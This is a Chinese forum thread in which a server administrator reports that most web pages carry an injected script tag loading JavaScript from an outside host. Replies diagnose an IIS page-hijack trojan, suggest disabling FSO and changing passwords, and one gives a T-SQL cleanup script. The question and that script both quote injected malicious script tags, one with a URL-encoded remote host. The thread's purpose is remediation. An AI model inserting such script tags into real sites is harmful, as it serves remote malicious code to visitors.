服务器被嵌入JS代码 
网页的源文件几乎(百分之七八十吧)都被嵌入: 
<script language="javascript" src="http://css.qpoe.com/css.js?mo=8&esa=21"> </script> 用瑞星,木马清道夫,WINDOWS清理工具,360安全卫士都查遍了,就是找不到木马所在。 
如果是SQL注入,服务器上几乎所有的网页都有。包括ASP,ASP.NET。当中也有用ACCESS数据库的。 也进行了ARP静态绑定。 请问各位,还有何高见?能清除这个故障

解决方案 »

  1.   

    IIS安全问题。被挂马了。
      

  2.   

    把这段话删除掉,然后杀毒,写过滤SQL脚本,改密码就可以解决了
      

  3.   

    一般是asp木马程序,注意FSO权限
      

  4.   


    DECLARE @fieldtype sysname
    SET @fieldtype='varchar'--删除处理
    DECLARE hCForEach CURSOR GLOBAL
    FOR
    SELECT N'update '+QUOTENAME(o.name)
        +N' set  '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''"></title><script src=http://%66%75%63%6B%75%75%2E%75%73/1.js></scr'','''')'
    FROM sysobjects o,syscolumns c,systypes t
    WHERE o.id=c.id 
        AND OBJECTPROPERTY(o.id,N'IsUserTable')=1
        AND c.xusertype=t.xusertype
        AND t.name=@fieldtype
    EXEC sp_MSforeach_Worker @command1=N'?'
    把中间的字符串换成你被注入的JS,在分析器里面执行一下就行了!
      

  5.   

    我们公司的服务器就中过,把fso关闭就没了,然后找个批量替换的东西替换下就ok了。
      

  6.   

    这种问题很严重,一般都是网站存在漏洞或者服务器存在漏洞而被攻击了,若需要安全技术服务请联系EMAIL & MSN:[email protected], 7X24 为您的网站和服务器保驾护航。